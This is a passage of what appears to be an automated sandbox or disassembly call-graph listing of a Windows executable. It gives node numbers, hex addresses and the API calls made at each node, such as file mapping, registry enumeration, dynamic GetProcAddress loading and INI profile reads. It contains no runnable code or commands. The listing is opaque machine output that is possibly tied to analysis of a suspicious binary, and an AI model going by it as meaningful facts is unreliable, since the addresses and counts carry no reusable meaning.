40e0f1 CreateFileMappingW 38863->38864 38865 40e140 CloseHandle CloseHandle 38864->38865 38866 40e10b MapViewOfFile 38864->38866 38865->38856 38867 40e13b CloseHandle 38866->38867 38868 40e11f WriteFile UnmapViewOfFile 38866->38868 38867->38865 38868->38867 38870 40e18c 38869->38870 38871 406b90 11 API calls 38870->38871 38872 40e19f 38871->38872 38873 40e1a7 memset 38872->38873 38874 40e299 38872->38874 38879 40e1e8 38873->38879 38875 4069a3 ??3@YAXPAX free 38874->38875 38876 40e2a4 38875->38876 38876->38841 38877 406e8f 13 API calls 38877->38879 38878 406b53 SetFilePointerEx ReadFile 38878->38879 38879->38877 38879->38878 38880 40dd50 _wcsicmp 38879->38880 38881 40e283 38879->38881 38885 40742e 8 API calls 38879->38885 38886 40aae3 wcslen wcslen _memicmp 38879->38886 38887 40e244 _snwprintf 38879->38887 38880->38879 38882 40e291 38881->38882 38883 40e288 free 38881->38883 38884 40aa04 free 38882->38884 38883->38882 38884->38874 38885->38879 38886->38879 38888 40a8d0 7 API calls 38887->38888 38888->38879 38890 40e2c2 38889->38890 38891 406b90 11 API calls 38890->38891 38902 40e2d3 38891->38902 38892 40e4a0 38893 4069a3 ??3@YAXPAX free 38892->38893 38895 40e4ab 38893->38895 38894 406e8f 13 API calls 38894->38902 38895->38841 38896 406b53 SetFilePointerEx ReadFile 38896->38902 38897 40e489 38898 40aa04 free 38897->38898 38899 40e491 38898->38899 38899->38892 38901 40e497 free 38899->38901 38900 40dd50 _wcsicmp 38900->38902 38901->38892 38902->38892 38902->38894 38902->38896 38902->38897 38902->38900 38903 40dd50 _wcsicmp 38902->38903 38906 40742e 8 API calls 38902->38906 38907 40e3e0 memcpy 38902->38907 38908 40e3fb memcpy 38902->38908 38909 40e3b3 wcschr 38902->38909 38910 40e416 memcpy 38902->38910 38911 40e431 memcpy 38902->38911 38904 40e376 memset 38903->38904 38905 40aa29 6 API calls 38904->38905 38905->38902 38906->38902 38907->38902 38908->38902 38909->38902 38910->38902 38911->38902 38912->38827 38914 40a980 38913->38914 38915 40a995 _wcsicmp 38914->38915 38916 40a99c wcscmp 38914->38916 38917 40a8bb 38914->38917 38915->38914 38916->38914 38917->38768 38917->38769 38918->38772 38920 40aa23 RegEnumValueW 38919->38920 38920->38781 38920->38782 38922 405335 38921->38922 38923 40522a 38921->38923 38922->38373 38924 40b2cc 27 API calls 38923->38924 38925 405234 38924->38925 38926 40a804 8 API calls 38925->38926 38927 40523a 38926->38927 38966 40b273 38927->38966 38929 405248 _mbscpy _mbscat GetProcAddress 38930 40b273 27 API calls 38929->38930 38931 405279 38930->38931 38969 405211 GetProcAddress 38931->38969 38933 405282 38934 40b273 27 API calls 38933->38934 38935 40528f 38934->38935 38970 405211 GetProcAddress 38935->38970 38937 405298 38938 40b273 27 API calls 38937->38938 38939 4052a5 38938->38939 38971 405211 GetProcAddress 38939->38971 38941 4052ae 38942 40b273 27 API calls 38941->38942 38943 4052bb 38942->38943 38972 405211 GetProcAddress 38943->38972 38945 4052c4 38946 40b273 27 API calls 38945->38946 38947 4052d1 38946->38947 38973 405211 GetProcAddress 38947->38973 38949 4052da 38950 40b273 27 API calls 38949->38950 38951 4052e7 38950->38951 38974 405211 GetProcAddress 38951->38974 38953 4052f0 38954 40b273 27 API calls 38953->38954 38955 4052fd 38954->38955 38975 405211 GetProcAddress 38955->38975 38957 405306 38958 40b273 27 API calls 38957->38958 38959 405313 38958->38959 38976 405211 GetProcAddress 38959->38976 38961 40531c 38962 40b273 27 API calls 38961->38962 38963 405329 38962->38963 38977 405211 GetProcAddress 38963->38977 38965 405332 38965->38922 38967 40b58d 27 API calls 38966->38967 38968 40b18c 38967->38968 38968->38929 38969->38933 38970->38937 38971->38941 38972->38945 38973->38949 38974->38953 38975->38957 38976->38961 38977->38965 38979 40440c FreeLibrary 38978->38979 38980 40436d 38979->38980 38981 40a804 8 API calls 38980->38981 38982 404377 38981->38982 38983 404383 38982->38983 38984 404405 38982->38984 38985 40b273 27 API calls 38983->38985 38984->38379 38984->38380 38984->38384 38986 40438d GetProcAddress 38985->38986 38987 40b273 27 API calls 38986->38987 38988 4043a7 GetProcAddress 38987->38988 38989 40b273 27 API calls 38988->38989 38990 4043ba GetProcAddress 38989->38990 38991 40b273 27 API calls 38990->38991 38992 4043ce GetProcAddress 38991->38992 38993 40b273 27 API calls 38992->38993 38994 4043e2 GetProcAddress 38993->38994 38995 4043f1 38994->38995 38996 4043f7 38995->38996 38997 40440c FreeLibrary 38995->38997 38996->38984 38997->38984 38999 404413 FreeLibrary 38998->38999 39000 40441e 38998->39000 38999->39000 39000->38395 39001->38391 39003 40447e 39002->39003 39004 40442e 39002->39004 39003->38391 39005 40b2cc 27 API calls 39004->39005 39006 404438 39005->39006 39007 40a804 8 API calls 39006->39007 39008 40443e 39007->39008 39009 404445 39008->39009 39010 404467 39008->39010 39011 40b273 27 API calls 39009->39011 39010->39003 39013 404475 FreeLibrary 39010->39013 39012 40444f GetProcAddress 39011->39012 39012->39010 39014 404460 39012->39014 39013->39003 39014->39010 39016 4135f6 39015->39016 39017 4135eb FreeLibrary 39015->39017 39016->38398 39017->39016 39019 4449c4 39018->39019 39020 444a52 39018->39020 39021 40b2cc 27 API calls 39019->39021 39020->38415 39020->38416 39022 4449cb 39021->39022 39023 40a804 8 API calls 39022->39023 39024 4449d1 39023->39024 39025 40b273 27 API calls 39024->39025 39026 4449dc GetProcAddress 39025->39026 39027 40b273 27 API calls 39026->39027 39028 4449f3 GetProcAddress 39027->39028 39029 40b273 27 API calls 39028->39029 39030 444a04 GetProcAddress 39029->39030 39031 40b273 27 API calls 39030->39031 39032 444a15 GetProcAddress 39031->39032 39033 40b273 27 API calls 39032->39033 39034 444a26 GetProcAddress 39033->39034 39035 40b273 27 API calls 39034->39035 39036 444a37 GetProcAddress 39035->39036 39037 40b273 27 API calls 39036->39037 39038 444a48 GetProcAddress 39037->39038 39038->39020 39039->38426 39040->38426 39041->38426 39042->38426 39043->38417 39045 403a29 39044->39045 39059 403bed memset memset 39045->39059 39047 403ae7 39072 40b1ab free free 39047->39072 39048 403a3f memset 39052 403a2f 39048->39052 39050 403aef 39050->38433 39051 409d1f 6 API calls 39051->39052 39052->39047 39052->39048 39052->39051 39053 409b98 GetFileAttributesW 39052->39053 39054 40a8d0 7 API calls 39052->39054 39053->39052 39054->39052 39056 40a051 GetFileTime CloseHandle 39055->39056 39057 4039ca CompareFileTime 39055->39057 39056->39057 39057->38433 39058->38434 39060 414c2e 14 API calls 39059->39060 39061 403c38 39060->39061 39062 409719 2 API calls 39061->39062 39063 403c3f wcscat 39062->39063 39064 414c2e 14 API calls 39063->39064 39065 403c61 39064->39065 39066 409719 2 API calls 39065->39066 39067 403c68 wcscat 39066->39067 39073 403af5 39067->39073 39070 403af5 20 API calls 39071 403c95 39070->39071 39071->39052 39072->39050 39074 403b02 39073->39074 39075 40ae18 9 API calls 39074->39075 39084 403b37 39075->39084 39076 403bdb 39078 40aebe FindClose 39076->39078 39077 40add4 wcscmp wcscmp 39077->39084 39079 403be6 39078->39079 39079->39070 39080 40a8d0 7 API calls 39080->39084 39081 40ae18 9 API calls 39081->39084 39082 40ae51 9 API calls 39082->39084 39083 40aebe FindClose 39083->39084 39084->39076 39084->39077 39084->39080 39084->39081 39084->39082 39084->39083 39086 409d1f 6 API calls 39085->39086 39087 404190 39086->39087 39100 409b98 GetFileAttributesW 39087->39100 39089 40419c 39090 4041a7 6 API calls 39089->39090 39091 40435c 39089->39091 39092 40424f 39090->39092 39091->38455 39092->39091 39094 40425e memset 39092->39094 39096 409d1f 6 API calls 39092->39096 39097 40a8ab 9 API calls 39092->39097 39101 414842 39092->39101 39094->39092 39095 404296 wcscpy 39094->39095 39095->39092 39096->39092 39098 4042b6 memset memset _snwprintf wcscpy 39097->39098 39098->39092 39099->38459 39100->39089 39104 41443e 39101->39104 39103 414866 39103->39092 39105 41444b 39104->39105 39106 414451 39105->39106 39107 4144a3 GetPrivateProfileStringW 39105->39107 39108 414491 39106->39108 39109 414455 wcschr 39106->39109 39107->39103 39111 414495 WritePrivateProfileStringW 39108->39111 39109->39108 39110 414463 _snwprintf 39109->39110 39110->39111 39111->39103 39112->38464 39114 40b2cc 27 API calls 39113->39114 39115 409615 39114->39115 39116 409d1f 6 API calls 39115->39116 39117 409625 39116->39117 39142 409b98 GetFileAttributesW 39117->39142 39119 409634 39120 409648 39119->39120 39143 4091b8 memset 39119->39143 39122 40b2cc 27 API calls 39120->39122 39124 408801 39120->39124 39123 40965d 39122->39123 39125 409d1f 6 API calls 39123->39125 39124->38467 39124->38511 39126 40966d 39125->39126 39195 409b98 GetFileAttributesW 39126->39195 39128 40967c 39128->39124 39129 409681 39128->39129 39196 409529 72 API calls 39129->39196 39131 409690 39131->39124 39132->38489 39133->38511 39134->38494 39135->38511 39136->38499 39142->39119 39197 40a6e6 WideCharToMultiByte 39143->39197 39145 409202 39198 444432 39145->39198 39148 40b273 27 API calls 39149 409236 39148->39149 39244 438552 39149->39244 39152 409383 39154 40b273 27 API calls 39152->39154 39156 409399 39154->39156 39155 409254 39157 40937b 39155->39157 39265 4253cf 17 API calls 39155->39265 39158 438552 133 API calls 39156->39158 39269 424f26 122 API calls 39157->39269 39177 4093a3 39158->39177 39161 409267 39162 4094ff 39273 443d90 39162->39273 39165 4251c4 136 API calls 39165->39177 39167 409507 39175 40951d 39167->39175 39293 408f2f 77 API calls 39167->39293 39169 4093df 39272 424f26 122 API calls 39169->39272 39171 4253cf 17 API calls 39171->39177 39175->39120 39177->39162 39177->39165 39177->39169 39177->39171 39179 4093e4 39177->39179 39270 4253af 17 API calls 39179->39270 39185 4093ed 39271 4253af 17 API calls 39185->39271 39188 4093f9 39188->39169 39189 409409 memcmp 39188->39189 39189->39169 39190 409421 memcmp 39189->39190 39195->39128 39196->39131 39197->39145 39294 4438b5 39198->39294 39200 44444c 39206 409215 39200->39206 39308 415a6d 39200->39308 39203 444486 39205 4444b9 memcpy 39203->39205 39243 4444a4 39203->39243 39204 44469e 39204->39206 39208 443d90 110 API calls 39204->39208 39312 415258 39205->39312 39206->39148 39206->39175 39208->39206 39209 444524 39210 444541 39209->39210 39211 44452a 39209->39211 39315 444316 39210->39315 39349 416935 39211->39349 39215 444316 18 API calls 39216 444563 39215->39216 39217 444316 18 API calls 39216->39217 39218 44456f 39217->39218 39219 444316 18 API calls 39218->39219 39220 44457f 39219->39220 39220->39243 39329 432d4e 39220->39329 39223 444316 18 API calls 39362 4442e6 11 API calls 39243->39362 39363 438460 39244->39363 39246 409240 39246->39152 39247 4251c4 39246->39247 39375 424f07 39247->39375 39249 4251e4 39250 4251f7 39249->39250 39251 4251e8 39249->39251 39383 4250f8 39250->39383 39382 4446ea 11 API calls 39251->39382 39253 4251f2 39253->39155 39255 425209 39258 425249 39255->39258 39261 4250f8 126 API calls 39255->39261 39262 425287 39255->39262 39391 4384e9 134 API calls 39255->39391 39392 424f74 123 API calls 39255->39392 39258->39262 39261->39255 39265->39161 39269->39152 39270->39185 39271->39188 39272->39162 39274 443da3 39273->39274 39292 443db6 39273->39292 39396 41707a 39274->39396 39276 443da8 39277 443dac 39276->39277 39279 443dbc 39276->39279 39409 4446ea 11 API calls 39277->39409 39401 4300e8 39279->39401 39292->39167 39293->39175 39295 4438d0 39294->39295 39307 4438c9 39294->39307 39296 415378 memcpy memcpy 39295->39296 39297 4438d5 39296->39297 39298 4154e2 10 API calls 39297->39298 39299 443906 39297->39299 39297->39307 39298->39299 39300 443970 memset 39299->39300 39299->39307 39302 44398b 39300->39302 39301 415700 10 API calls 39304 4439c0 39301->39304 39303 41975c 10 API calls 39302->39303 39305 4439a0 39302->39305 39303->39305 39306 418981 10 API calls 39304->39306 39304->39307 39305->39301 39305->39307 39306->39307 39307->39200 39309 415a77 39308->39309 39310 415a8d 39309->39310 39311 415a7e memset 39309->39311 39310->39203 39311->39310 39313 4438b5 11 API calls 39312->39313 39314 41525d 39313->39314 39314->39209 39316 444328 39315->39316 39317 444423 39316->39317 39318 44434e 39316->39318 39319 4446ea 11 API calls 39317->39319 39320 432d4e memset memset memcpy 39318->39320 39326 444381 39319->39326 39321 44435a 39320->39321 39323 444375 39321->39323 39328 44438b 39321->39328 39322 432d4e memset memset memcpy 39324 4443ec 39322->39324 39325 416935 16 API calls 39323->39325 39324->39326 39327 416935 16 API calls 39324->39327 39325->39326 39326->39215 39327->39326 39328->39322 39330 432d58 39329->39330 39332 432d65 39329->39332 39331 432cc4 memset memset memcpy 39330->39331 39331->39332 39332->39223 39350 41698e 39349->39350 39351 41693e 39349->39351 39350->39243 39352 41694c 39351->39352 39353 422fd1 memset 39351->39353 39352->39350 39354 4165a0 11 API calls 39352->39354 39353->39352 39355 416972 39354->39355 39355->39350 39356 422b84 15 API calls 39355->39356 39356->39350 39362->39204 39364 41703f 11 API calls 39363->39364 39365 43847a 39364->39365 39366 43848a 39365->39366 39367 43847e 39365->39367 39369 438270 133 API calls 39366->39369 39368 4446ea 11 API calls 39367->39368 39371 438488 39368->39371 39370 4384aa 39369->39370 39370->39371 39372 424f26 122 API calls 39370->39372 39371->39246 39373 4384bb 39372->39373 39374 438270 133 API calls 39373->39374 39374->39371 39376 424f1f 39375->39376 39377 424f0c 39375->39377 39379 424eea 11 API calls 39376->39379 39378 416760 11 API calls 39377->39378 39380 424f18 39378->39380 39381 424f24 39379->39381 39380->39249 39381->39249 39382->39253 39384 425108 39383->39384 39390 42510d 39383->39390 39385 424f74 123 API calls 39384->39385 39385->39390 39386 42569b 124 API calls 39387 42516e 39386->39387 39389 415c7d 16 API calls 39387->39389 39388 425115 39388->39255 39389->39388 39390->39386 39390->39388 39391->39255 39392->39255 39397 417085 39396->39397 39398 4170ab 39396->39398 39397->39398 39399 416760 11 API calls 39397->39399 39398->39276 39400 4170a4 39399->39400 39400->39276 39409->39292 39439 413f4f 39412->39439 39415 413f37 K32GetModuleFileNameExW 39416 413f4a 39415->39416 39416->38527 39418 41396c wcschr 39417->39418 39420 413969 wcscpy 39417->39420 39418->39420 39421 41398e 39418->39421 39422 413a3a 39420->39422 39444 4097f7 wcslen wcslen _memicmp 39421->39444 39422->38527 39424 41399a 39425 4139a4 memset 39424->39425 39426 4139e6 39424->39426 39445 409dd5 GetWindowsDirectoryW wcscpy 39425->39445 39428 413a31 wcscpy 39426->39428 39429 4139ec memset 39426->39429 39428->39422 39446 409dd5 GetWindowsDirectoryW wcscpy 39429->39446 39430 4139c9 wcscpy wcscat 39430->39422 39432 413a11 memcpy wcscat 39432->39422 39434 413cb0 GetModuleHandleW 39433->39434 39435 413cda 39433->39435 39434->39435 39436 413cbf GetProcAddress 39434->39436 39437 413ce3 GetProcessTimes 39435->39437 39438 413cf6 39435->39438 39436->39435 39437->38529 39438->38529 39440 413f2f 39439->39440 39441 413f54 39439->39441 39440->39415 39440->39416 39442 40a804 8 API calls 39441->39442 39443 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39442->39443 39443->39440 39444->39424 39445->39430 39446->39432 39447->38550 39448->38572 39450 409cf9 GetVersionExW 39449->39450 39451 409d0a 39449->39451 39450->39451 39451->38579 39451->38582 39452->38586 39453->38588 39454->38654 39456 40bba5 39455->39456 39503 40cc26 39456->39503 39459 40bd4b 39524 40cc0c 39459->39524 39464 40b2cc 27 API calls 39465 40bbef 39464->39465 39531 40ccf0 _wcsicmp 39465->39531 39467 40bbf5 39467->39459 39532 40ccb4 6 API calls 39467->39532 39469 40bc26 39470 40cf04 17 API calls 39469->39470 39471 40bc2e 39470->39471 39472 40bd43 39471->39472 39473 40b2cc 27 API calls 39471->39473 39474 40cc0c 4 API calls 39472->39474 39475 40bc40 39473->39475 39474->39459 39533 40ccf0 _wcsicmp 39475->39533 39477 40bc46 39477->39472 39478 40bc61 memset memset WideCharToMultiByte 39477->39478 39534 40103c strlen 39478->39534 39480 40bcc0 39481 40b273 27 API calls 39480->39481 39482 40bcd0 memcmp 39481->39482 39482->39472 39483 40bce2 39482->39483 39484 404423 37 API calls 39483->39484 39485 40bd10 39484->39485 39485->39472 39486 40bd3a LocalFree 39485->39486 39487 40bd1f memcpy 39485->39487 39486->39472 39487->39486 39488->38669 39490 409a74 GetTempFileNameW 39489->39490 39491 409a66 GetWindowsDirectoryW 39489->39491 39490->38667 39491->39490 39492->38704 39493->38704 39494->38704 39495->38704 39496->38704 39497->38704 39498->38704 39499->38704 39500->38704 39501->38679 39502->38701 39535 4096c3 CreateFileW 39503->39535 39505 40cc34 39506 40cc3d GetFileSize 39505->39506 39507 40bbca 39505->39507 39508 40afcf 2 API calls 39506->39508 39507->39459 39515 40cf04 39507->39515 39509 40cc64 39508->39509 39536 40a2ef ReadFile 39509->39536 39511 40cc71 39537 40ab4a MultiByteToWideChar 39511->39537 39513 40cc95 CloseHandle 39514 40b04b ??3@YAXPAX 39513->39514 39514->39507 39516 40b633 free 39515->39516 39517 40cf14 39516->39517 39543 40b1ab free free 39517->39543 39519 40bbdd 39519->39459 39519->39464 39520 40cf1b 39520->39519 39522 40cfef 39520->39522 39544 40cd4b 39520->39544 39523 40cd4b 14 API calls 39522->39523 39523->39519 39525 40b633 free 39524->39525 39526 40cc15 39525->39526 39527 40aa04 free 39526->39527 39528 40cc1d 39527->39528 39593 40b1ab free free 39528->39593 39530 40b7d4 memset CreateFileW 39530->38660 39530->38661 39531->39467 39532->39469 39533->39477 39534->39480 39535->39505 39536->39511 39538 40ab93 39537->39538 39539 40ab6b 39537->39539 39538->39513 39540 40a9ce 4 API calls 39539->39540 39541 40ab74 39540->39541 39542 40ab7c MultiByteToWideChar 39541->39542 39542->39538 39543->39520 39545 40cd7b 39544->39545 39578 40aa29 39545->39578 39547 40cef5 39548 40aa04 free 39547->39548 39549 40cefd 39548->39549 39549->39520 39551 40aa29 6 API calls 39552 40ce1d 39551->39552 39553 40aa29 6 API calls 39552->39553 39554 40ce3e 39553->39554 39555 40ce6a 39554->39555 39586 40abb7 wcslen memmove 39554->39586 39556 40ce9f 39555->39556 39589 40abb7 wcslen memmove 39555->39589 39559 40a8d0 7 API calls 39556->39559 39562 40ceb5 39559->39562 39560 40ce56 39587 40aa71 wcslen 39560->39587 39561 40ce8b 39590 40aa71 wcslen 39561->39590 39568 40a8d0 7 API calls 39562->39568 39565 40ce5e 39588 40abb7 wcslen memmove 39565->39588 39566 40ce93 39591 40abb7 wcslen memmove 39566->39591 39570 40cecb 39568->39570 39592 40d00b malloc memcpy free free 39570->39592 39572 40cedd 39573 40aa04 free 39572->39573 39574 40cee5 39573->39574 39575 40aa04 free 39574->39575 39576 40ceed 39575->39576 39577 40aa04 free 39576->39577 39577->39547 39579 40aa33 39578->39579 39585 40aa63 39578->39585 39580 40aa44 39579->39580 39581 40aa38 wcslen 39579->39581 39582 40a9ce malloc memcpy free free 39580->39582 39581->39580 39583 40aa4d 39582->39583 39584 40aa51 memcpy 39583->39584 39583->39585 39584->39585 39585->39547 39585->39551 39586->39560 39587->39565 39588->39555 39589->39561 39590->39566 39591->39556 39592->39572 39593->39530 39594->38719 39595->38727 39596 44dea5 39597 44deb5 FreeLibrary 39596->39597 39598 44dec3 39596->39598 39597->39598 39781 4148b6 FindResourceW 39782 4148cf SizeofResource 39781->39782 39785 4148f9 39781->39785 39783 4148e0 LoadResource 39782->39783 39782->39785 39784 4148ee LockResource 39783->39784 39783->39785 39784->39785 39791 441b3f 39801 43a9f6 39791->39801 39793 441b61 39974 4386af memset 39793->39974 39795 44189a 39796 4418e2 39795->39796 39798 442bd4 39795->39798 39797 4418ea 39796->39797 39975 4414a9 12 API calls 39796->39975 39798->39797 39976 441409 memset 39798->39976 39802 43aa20 39801->39802 39803 43aadf 39801->39803 39802->39803 39804 43aa34 memset 39802->39804 39803->39793 39805 43aa56 39804->39805 39806 43aa4d 39804->39806 39977 43a6e7 39805->39977 39985 42c02e memset 39806->39985 39811 43aad3 39987 4169a7 11 API calls 39811->39987 39812 43aaae 39812->39803 39812->39811 39827 43aae5 39812->39827 39813 43ac18 39816 43ac47 39813->39816 39989 42bbd5 memcpy memcpy memcpy memset memcpy 39813->39989 39817 43aca8 39816->39817 39990 438eed 16 API calls 39816->39990 39820 43acd5 39817->39820 39992 4233ae 11 API calls 39817->39992 39993 423426 11 API calls 39820->39993 39821 43ac87 39991 4233c5 16 API calls 39821->39991 39825 43ace1 39994 439811 163 API calls 39825->39994 39826 43a9f6 161 API calls 39826->39827 39827->39803 39827->39813 39827->39826 39988 439bbb 22 API calls 39827->39988 39829 43acfd 39834 43ad2c 39829->39834 39995 438eed 16 API calls 39829->39995 39831 43ad19 39996 4233c5 16 API calls 39831->39996 39832 43ad58 39997 44081d 163 API calls 39832->39997 39834->39832 39838 43add9 39834->39838 39837 43ae3a memset 39839 43ae73 39837->39839 39838->39838 40001 423426 11 API calls 39838->40001 40002 42e1c0 147 API calls 39839->40002 39840 43adab 39999 438c4e 163 API calls 39840->39999 39843 43ad6c 39843->39803 39843->39840 39998 42370b memset memcpy memset 39843->39998 39845 43adcc 40000 440f84 12 API calls 39845->40000 39846 43ae96 40003 42e1c0 147 API calls 39846->40003 39849 43aea8 39850 43aec1 39849->39850 40004 42e199 147 API calls 39849->40004 39851 43af00 39850->39851 40005 42e1c0 147 API calls 39850->40005 39851->39803 39855 43af1a 39851->39855 39856 43b3d9 39851->39856 40006 438eed 16 API calls 39855->40006 39862 43b4c8 39856->39862 39863 43b3f6 39856->39863 39858 43b60f 39858->39803 40065 4393a5 17 API calls 39858->40065 39860 43af2f 40007 4233c5 16 API calls 39860->40007 39866 43b4f2 39862->39866 40053 42bbd5 memcpy memcpy memcpy memset memcpy 39862->40053 40047 432878 12 API calls 39863->40047 39864 43af51 40008 423426 11 API calls 39864->40008 40054 43a76c 21 API calls 39866->40054 39868 43af7d 40009 423426 11 API calls 39868->40009 39872 43b529 40055 44081d 163 API calls 39872->40055 39873 43b462 40049 423330 11 API calls 39873->40049 39874 43af94 40010 423330 11 API calls 39874->40010 39878 43afca 40011 423330 11 API calls 39878->40011 39879 43b47e 39883 43b497 39879->39883 40050 42374a memcpy memset memcpy memcpy memcpy 39879->40050 39880 43b544 39884 43b55c 39880->39884 40056 42c02e memset 39880->40056 39881 43b428 39881->39873 40048 432b60 16 API calls 39881->40048 40051 4233ae 11 API calls 39883->40051 40057 43a87a 163 API calls 39884->40057 39885 43afdb 40012 4233ae 11 API calls 39885->40012 39891 43b56c 39894 43b58a 39891->39894 40058 423330 11 API calls 39891->40058 39892 43b4b1 40052 423399 11 API calls 39892->40052 39893 43afee 40013 44081d 163 API calls 39893->40013 40059 440f84 12 API calls 39894->40059 39896 43b4c1 40061 42db80 163 API calls 39896->40061 39901 43b592 40060 43a82f 16 API calls 39901->40060 39904 43b5b4 40062 438c4e 163 API calls 39904->40062 39906 43b5cf 40063 42c02e memset 39906->40063 39908 43b005 39908->39803 39912 43b01f 39908->39912 40014 42d836 163 API calls 39908->40014 39909 43b1ef 40024 4233c5 16 API calls 39909->40024 39912->39909 40022 423330 11 API calls 39912->40022 40023 42d71d 163 API calls 39912->40023 39913 43b212 40025 423330 11 API calls 39913->40025 39914 43b087 40015 4233ae 11 API calls 39914->40015 39915 43add4 39915->39858 40064 438f86 16 API calls 39915->40064 39919 43b22a 40026 42ccb5 11 API calls 39919->40026 39922 43b23f 40027 4233ae 11 API calls 39922->40027 39923 43b10f 40018 423330 11 API calls 39923->40018 39925 43b257 40028 4233ae 11 API calls 39925->40028 39929 43b129 40019 4233ae 11 API calls 39929->40019 39930 43b26e 40029 4233ae 11 API calls 39930->40029 39933 43b09a 39933->39923 40016 42cc15 19 API calls 39933->40016 40017 4233ae 11 API calls 39933->40017 39934 43b282 40030 43a87a 163 API calls 39934->40030 39936 43b13c 40020 440f84 12 API calls 39936->40020 39938 43b29d 40031 423330 11 API calls 39938->40031 39941 43b15f 40021 4233ae 11 API calls 39941->40021 39942 43b2af 39944 43b2b8 39942->39944 39945 43b2ce 39942->39945 40032 4233ae 11 API calls 39944->40032 40033 440f84 12 API calls 39945->40033 39948 43b2c9 40035 4233ae 11 API calls 39948->40035 39949 43b2da 40034 42370b memset memcpy memset 39949->40034 39952 43b2f9 40036 423330 11 API calls 39952->40036 39954 43b30b 40037 423330 11 API calls 39954->40037 39956 43b325 40038 423399 11 API calls 39956->40038 39958 43b332 40039 4233ae 11 API calls 39958->40039 39960 43b354 40040 423399 11 API calls 39960->40040 39962 43b364 40041 43a82f 16 API calls 39962->40041 39964 43b370 40042 42db80 163 API calls 39964->40042 39966 43b380 40043 438c4e 163 API calls 39966->40043 39968 43b39e 40044 423399 11 API calls 39968->40044 39970 43b3ae 40045 43a76c 21 API calls 39970->40045 39972 43b3c3 40046 423399 11 API calls 39972->40046 39974->39795 39975->39797 39976->39798 39978 43a6f5 39977->39978 39984 43a765 39977->39984 39978->39984 40066 42a115 39978->40066 39982 43a73d 39983 42a115 147 API calls 39982->39983 39982->39984 39983->39984 39984->39803 39986 4397fd memset 39984->39986 39985->39805 39986->39812 39987->39803 39988->39827 39989->39816 39990->39821 39991->39817 39992->39820 39993->39825 39994->39829 39995->39831 39996->39834 39997->39843 39998->39840 39999->39845 40000->39915 40001->39837 40002->39846 40003->39849 40004->39850 40005->39850 40006->39860 40007->39864 40008->39868 40009->39874 40010->39878 40011->39885 40012->39893 40013->39908 40014->39914 40015->39933 40016->39933 40017->39933 40018->39929 40019->39936 40020->39941 40021->39912 40022->39912 40023->39912 40024->39913 40025->39919 40026->39922 40027->39925 40028->39930 40029->39934 40030->39938 40031->39942 40032->39948 40033->39949 40034->39948 40035->39952 40036->39954 40037->39956 40038->39958 40039->39960 40040->39962 40041->39964 40042->39966 40043->39968 40044->39970 40045->39972 40046->39915 40047->39881 40048->39873 40049->39879 40050->39883 40051->39892 40052->39896 40053->39866 40054->39872 40055->39880 40056->39884 40057->39891 40058->39894 40059->39901 40060->39896 40061->39904 40062->39906 40063->39915 40064->39858 40065->39803 40067 42a175 40066->40067 40069 42a122 40066->40069 40067->39984 40072 42b13b 147 API calls 40067->40072 40069->40067 40070 42a115 147 API calls 40069->40070 40073 43a174 40069->40073 40097 42a0a8 147 API calls 40069->40097 40070->40069 40072->39982 40087 43a196 40073->40087 40088 43a19e 40073->40088 40074 43a306 40074->40087 40117 4388c4 14 API calls 40074->40117 40077 42a115 147 API calls 40077->40088 40079 43a642 40079->40087 40121 4169a7 11 API calls 40079->40121 40083 43a635 40120 42c02e memset 40083->40120 40087->40069 40088->40074 40088->40077 40088->40087 40098 42ff8c 40088->40098 40106 415a91 40088->40106 40110 4165ff 40088->40110 40113 439504 13 API calls 40088->40113 40114 4312d0 147 API calls 40088->40114 40115 42be4c memcpy memcpy memcpy memset memcpy 40088->40115 40116 43a121 11 API calls 40088->40116 40090 42bf4c 14 API calls 40092 43a325 40090->40092 40091 4169a7 11 API calls 40091->40092 40092->40079 40092->40083 40092->40087 40092->40090 40092->40091 40093 42b5b5 memset memcpy 40092->40093 40096 4165ff 11 API calls 40092->40096 40118 42b63e 14 API calls 40092->40118 40119 42bfcf memcpy 40092->40119 40093->40092 40096->40092 40097->40069 40122 43817e 40098->40122 40100 42ff9d 40100->40088 40101 42ff99 40101->40100 40102 42ffe3 40101->40102 40103 42ffd0 40101->40103 40127 4169a7 11 API calls 40102->40127 40126 4169a7 11 API calls 40103->40126 40107 415a9d 40106->40107 40108 415ab3 40107->40108 40109 415aa4 memset 40107->40109 40108->40088 40109->40108 40278 4165a0 40110->40278 40113->40088 40114->40088 40115->40088 40116->40088 40117->40092 40118->40092 40119->40092 40120->40079 40121->40087 40123 438187 40122->40123 40125 438192 40122->40125 40128 4380f6 40123->40128 40125->40101 40126->40100 40127->40100 40130 43811f 40128->40130 40129 438164 40129->40125 40130->40129 40132 4300e8 3 API calls 40130->40132 40133 437e5e 40130->40133 40132->40130 40156 437d3c 40133->40156 40135 437eb3 40135->40130 40136 437ea9 40136->40135 40142 437f22 40136->40142 40171 41f432 40136->40171 40139 437f06 40219 415c56 11 API calls 40139->40219 40140 437f7f 40143 437f95 40140->40143 40145 43802b 40140->40145 40142->40140 40144 432d4e 3 API calls 40142->40144 40220 415c56 11 API calls 40143->40220 40144->40140 40147 4165ff 11 API calls 40145->40147 40148 438054 40147->40148 40182 437371 40148->40182 40151 43806b 40152 438094 40151->40152 40221 42f50e 138 API calls 40151->40221 40154 437fa3 40152->40154 40155 4300e8 3 API calls 40152->40155 40154->40135 40222 41f638 103 API calls 40154->40222 40155->40154 40157 437d69 40156->40157 40160 437d80 40156->40160 40223 437ccb 11 API calls 40157->40223 40159 437d76 40159->40136 40160->40159 40161 437da3 40160->40161 40162 437d90 40160->40162 40164 438460 133 API calls 40161->40164 40162->40159 40227 437ccb 11 API calls 40162->40227 40167 437dcb 40164->40167 40165 437de8 40226 424f26 122 API calls 40165->40226 40167->40165 40224 444283 13 API calls 40167->40224 40169 437dfc 40225 437ccb 11 API calls 40169->40225 40172 41f54d 40171->40172 40178 41f44f 40171->40178 40173 41f466 40172->40173 40257 41c635 memset memset 40172->40257 40173->40139 40173->40142 40178->40173 40180 41f50b 40178->40180 40228 41f1a5 40178->40228 40253 41c06f memcmp 40178->40253 40254 41f3b1 89 API calls 40178->40254 40255 41f398 85 API calls 40178->40255 40180->40172 40180->40173 40256 41c295 85 API calls 40180->40256 40258 41703f 40182->40258 40184 437399 40185 43739d 40184->40185 40187 4373ac 40184->40187 40266 4446ea 11 API calls 40185->40266 40188 416935 16 API calls 40187->40188 40189 4373ca 40188->40189 40191 438460 133 API calls 40189->40191 40195 4251c4 136 API calls 40189->40195 40199 415a91 memset 40189->40199 40202 43758f 40189->40202 40214 437584 40189->40214 40218 